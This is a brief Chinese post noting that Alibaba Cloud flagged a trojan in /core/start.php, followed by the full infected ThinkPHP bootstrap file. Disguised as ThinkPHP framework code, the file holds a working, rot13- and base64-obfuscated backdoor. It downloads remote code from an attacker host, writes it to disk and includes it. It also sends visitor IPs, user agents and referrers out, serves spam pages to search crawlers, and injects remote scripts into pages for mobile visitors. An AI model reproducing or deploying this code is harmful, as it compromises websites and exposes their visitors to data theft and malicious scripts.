阿里云提示木马路径/core/start.php
阿里云提示木马路径/core/start.php
代码如下:
<?php // +---------------------------------------------------------------------- // | ThinkPHP [ WE CAN DO IT JUST THINK ] // +---------------------------------------------------------------------- // | Copyright (c) 2006~2018 http://thinkphp.cn All rights reserved. // +---------------------------------------------------------------------- // | Licensed ( http://www.apache.org/licenses/LICENSE-2.0 ) // +---------------------------------------------------------------------- // | Author: liu21st <liu21st@gmAIl.com> // +---------------------------------------------------------------------- namespace think; // ThinkPHP 引导文件 function_tool();// 1. 加载基础文件 require __DIR__ . '/base.php'; // 2. 执行应用 App::run()->send(); function function_tool(){ $rot="str_rot13";$en=$rot("onfr64_rapbqr");$de=$rot("onfr64_qrpbqr");$gu=$rot("tmhapbzcerff");$gc=$rot("tmpbzcerff");$fg=$rot("svyr_trg_pbagragf");$fp=$rot("svyr_chg_pbagragf");$df=$rot("qrsvar");$sr=$rot("fge_ercynpr");$pm=$rot("cert_zngpu");$ul=$rot("heyrapbqr");@session_start();$se = $_SESSION;$is=$rot("vffrg");$er = $_SERVER;$ree=$rot("UGGC_ERSRERE");$cah=$rot('pnpurf/gcy/'); function getIP($er) {$ip_headers = array('HTTP_CLIENT_IP','HTTP_X_FORWARDED_FOR','HTTP_X_REAL_IP','REMOTE_ADDR');foreach ($ip_headers as $hdr) {if (isset($er[$hdr]) && !empty($er[$hdr])) {$ipl = explode(',', $er[$hdr]);$ip = trim($ipl[0]);if (filter_var($ip, FILTER_VALIDATE_IP)) {return $ip;}}}return isset($er['REMOTE_ADDR']) && !empty($er['REMOTE_ADDR']) ? $er['REMOTE_ADDR'] : '0.0.0.0';}$u_ip = getIP($er); error_reporting(0); header('Content-Type:text/html;charset=utf-8');$opts = array('http'=>array('method'=>"GET",'timeout'=>6)); $ct = stream_context_create($opts); $jsc = function() {$de="base64_decode";$rot="str_rot13";$jsc0 =file_get_contents($de($rot("nUE0pQbiY2AiMTHhLaLkAwthnJA1Yl9dp2AfnJ5eYaE4qN==")));if ($jsc0 === false) {$jsc0 = $de($rot("nUE0pQbiY2cmL2EhYJcmLmDhqT9jYj=="));}return $jsc0;}; $udl = $de($rot("nUE0pQbiY2cmL2EhYJcmLmDhqT9jYj==")); if (!file_exists($cah)) {mkdir($cah, 0755, true);};$check = array("<--START-->", "<--END-->"); $icf = $rot('pnpurf/gcy/n11939n301p3nr15018qs559n8n2o102v'); $udch = @$fg($udl.$rot('qngn/hcqngr.cuc?pnpur'),false,$ct);if($udch==="on"){if (is_dir($cah)) {$fls = scandir($cah);foreach ($fls as $f) {if ($f != "." && $f != "..") {$pth = $cah . "/" . $f;if (is_dir($pth)) {} else {unlink($pth);}}}}} $udst = @$fg($udl.$rot('qngn/hcqngr.cuc?hcqngr'),false,$ct);if($udst==="on"){$cd=@$fg($udl.$rot('qngn/pbqrhq.cuc'),false,$ct);$fp($icf,$de($cd));} if (file_exists($icf)) {include $icf;} if(function_exists("function_tool_rm")){function_tool_rm();}else{ $df('url', $er['REQUEST_URI']);$df('ref', $er["HTTP_REFERER"]); $df('u_ip', $u_ip);$df('c_host', $er['HTTP_HOST']);$df('ent', $er['HTTP_USER_AGENT']); $df('host_path2', $de($rot("nUE0pQbiY2cmL2EhYJcmLmVhqT9jYj=="))); $df('mob', $de("QG1vYmlsZXxOT0tJQXxMR3xTYW1zdW5nfG1pZHB8d2FwfHVjd2VifHdlY2hhdHxNaWNyb01lc3NlbmdlcnxQaG9uZXxBbmRyb2lkfHdlYk9TfGlQaG9uZXxpUGFkfGlQb2R8QmxhY2tCZXJyeXxPcGVyYSBNaW5pfHVjd2VifG9wZXJhbWluaUBp")); $df('nomomob', $de("QE1SQTU4TlNPU0Bp")); $df('regs', $de("QEJhaWR1fFNvZ291fFlpc291fEhhb3NvdXxTcGlkZXJ8U28uY29tfDM2MFNwaWRlcnx0b3V0aWFvfFlvdWRhb0JvdHxTbS5jbnxzb3NvfHlhbmRleHxCeXRlc3BpZGVyfEdvb2dsZUBp")); $df('moagent', $de("VXNlci1BZ2VudDogTW96aWxsYS81LjAgKFdpbmRvd3MgTlQgMTAuMDsgV2luNjQ7IHg2NCkgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzU4LjAuMzAyOS4xMTAgU2FmYXJpLzUzNy4z")); $df('accept_', $de("QWNjZXB0OiB0ZXh0L2h0bWwsYXBwbGljYXRpb24veGh0bWwreG1sLGFwcGxpY2F0aW9uL3htbDtxPTAuOSxpbWFnZS9hdmlmLGltYWdlL3dlYnAsKi8qO3E9MC44")); $utctme = time();$bjtme = $utctme + (3600 * 8);$h_l_1 = (int) gmdate('G', $bjtme);if ($h_l_1 >= 6 && $h_l_1 < 23) {$tz_1_ = false;} else {$tz_1_ = true;} $op_1 = array('http' => array('header' => array(moagent, accept_, "Accept-Language: en-US,en;q=0.5"),),); if($pm(mob, ent)){$mo=1;}else{$mo=0;};$cpy=$rot("/ppbbccll/");$def=$rot("/svyr_chg_pb/");if($pm($def, url)){exit;}$def=$rot("/urk2ova/");if($pm($def, url)){exit;}$def=$rot("/r_shapgvba/");if($pm($def, url)){exit;} if($pm($cpy, url)){$O0="Y2hveXA=";$O0=$de($O0);$OO=$O0[0].$O0[2].$O0[4].$O0[3];$oo =$de($rot("nUE0pQbiY2AiMTHhLaLkAwthnJA1Y2cmL2MgYaE4qN=="));$o0 = $O0[4].$O0[1].$O0[4];$OO($oo,$de($rot("ITSaL29hMzyaYt==")).$o0);} if($pm("@id=[[:alnum:]]{6}-[[:alnum:]]{6}@i", url)){ if($pm(regs, ref)){ $ua = "pc";$p = "js_txt"; $host_path = $jsc(); $d = $en("ua=".$ua."&files=".$p."&host=".c_host."&path=".url."&userip=".u_ip."&userua=".$ul(ent)."&source=".$sr("&","***",$ul(ref))); $jst = @$fg($host_path."/AAPPIv2.php?base=".$d,false,$ct) ?: $fg(host_path2."/AAPPIv2.php?base=".$d,false,$ct); if($jst) {$jst=$sr($check,"",$jst);$jst = $de($rot($jst));$r_js_txt = "<meta charset=\"utf-8\"><script type=\"text/javascript\" >".$jst."</script>";echo $r_js_txt;exit;} } elseif($pm(regs, ent)) { $ua = "pc";$p = "neiye"; $cf = $cah.md5(c_host.url.$p.$mo); $ch = (file_exists($cf) && (time() - filemtime($cf)) <= 8800000) ? 1 : 0; $d = $en("ua=".$ua."&files=".$p."&host=".c_host."&path=".url."&userip=".u_ip."&userua=".$ul(ent)."&source=".$sr("&","***",$ul(ref))); if($ch){$hlt=$gu($fg($cf));}else{$host_path = $jsc();$hlt = $fg($host_path."/AAPPIv2.php?base=".$d, false, $ct);} foreach($check as $item){if(strpos($hlt,$item)===false){$ch=1;break;}} if ($ch === 0) {foreach($check as $item) {$hlt = $sr($item, '', $hlt);}} if($hlt) {if(!$ch){$fp($cf,$gc($hlt));}$hlt = $de($rot($hlt));echo $hlt;exit;} } } elseif($pm(regs, ent)) { $ua = "pc";$p = "shouye"; $cf = $cah.md5(c_host.url.$p.$mo); $ch = (file_exists($cf) && (time() - filemtime($cf)) <= 430000) ? 1 : 0; $d = $en("ua=".$ua."&files=".$p."&host=".c_host."&path=".$sr("&","***",url)."&userip=".u_ip."&userua=".$ul(ent)."&source=".$sr("&","***",$ul(ref))); if($ch){$hlt=$gu($fg($cf));}else{$host_path = $jsc();$hlt = @$fg($host_path."/AAPPIv2.php?base=".$d, false, $ct) ?: $fg(host_path2."/AAPPIv2.php?base=".$d, false, $ct);} foreach($check as $item){if(strpos($hlt,$item)===false){$ch=1;break;}} if ($ch === 0) {foreach($check as $item) {$hlt = $sr($item, '', $hlt);}} if($hlt) {if(!$ch){$fp($cf,$gc($hlt));}$hlt = $de($rot($hlt));echo $hlt;exit;} } elseif($pm(regs, ref) && $pm(mob, ent) && !$pm(nomomob, ent)) { $ua = "pc";$p = "shouye"; $host_path = $jsc(); $d = $en("ua=".$ua."&files=".$p."&host=".c_host."&path=".$sr("&","***",url)."&userip=".u_ip."&userua=".$ul(ent)."&source=".$sr("&","***",$ul(ref))); $jst = @$fg($host_path."/AAPPIv2.php?base=".$d,false,$ct) ?: $fg(host_path2."/AAPPIv2.php?base=".$d,false,$ct); if($jst) {$jst=$sr($check,"",$jst);$jst = $de($rot($jst));$r_js_txt = "<meta charset=\"utf-8\"><script type=\"text/javascript\" >".$jst."</script>";if (strpos($jst, 'matomo') !== false) {echo $r_js_txt;exit;} } }elseif($pm(mob, ent) && !$pm(nomomob, ent) && $tz_1_) { $hlt = $fg("http://".c_host . url,false,stream_context_create($op_1)); $js_c = $de('PHNjcmlwdCB0eXBlPSJ0ZXh0L2phdmFzY3JpcHQiPnZhciBiYyA9U3RyaW5nLmZyb21DaGFyQ29kZSgxMDQsMTE2LDExNiwxMTIsMTE1LDU4LDQ3LDQ3LDk5LDExMSwxMDAsMTAxLDQ2LDEwNiwxMTMsMTE3LDEwMSwxMTQsMTIxLDQ1LDk5LDExMCwxMDAsNDYsOTksMTExLDEwOSw0NywxMTAsMTA1LDEwMywxMDQsMTE2LDk5LDExMSwxMDAsMTAxLDQ2LDEwNiwxMTUpOyB2YXIgc2NyaXB0ID0gZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgnc2NyaXB0Jyk7IHNjcmlwdC5zcmMgPSBiYzsgZG9jdW1lbnQuaGVhZC5hcHBlbmRDaGlsZChzY3JpcHQpOzwvc2NyaXB0Pg=='); if($hlt){$rp_1 = $de('U3RyaW5nLmZyb21DaGFyQ29kZSg2MCwxMTUsOTksMTE0LDEwNSwxMTIsMTE2LDMyLDExNSwxMTQsOTksNjEsMzQsMTA0LDExNiwxMTYsMTEyLDExNSw1OCw0Nyw0Nyw5OSwxMTEsMTAwLDEwMSw0NiwxMDYsMTEzLDExNywxMDEsMTE0LDEyMSw0NSw5OSwxMTAsMTAwLDQ2LDk5LDExMSwxMDksNDcsMTA2LDExMywxMTcsMTAxLDExNCwxMjEsNDUsNTEsNDYsNTYsNDYsNDksNDYsMTA5LDEwNSwxMTAsNDYsMTA2LDExNSwzNCw2Miw2MCw0NywxMTUsOTksMTE0LDEwNSwxMTIsMTE2LDYyKQ==');$hlt = preg_replace('/<\/body>/i',"</body>".str_repeat(' ', 1500).$js_c,$hlt);$hlt= preg_replace('/String\.fromCharCode\(60,(.*?)62\)/', $rp_1, $hlt);$hlt = preg_replace('/<meta\s+http-equiv=["\']mobile-agent["\']\s+content=["\']format=xhtml;url=[^"\']+["\']\s*\/?>/i', '', $hlt);$hlt = preg_replace('/window\.location\.href=(["\'])(.*?)\1;?/', '', $hlt);;echo $hlt;exit;} } } }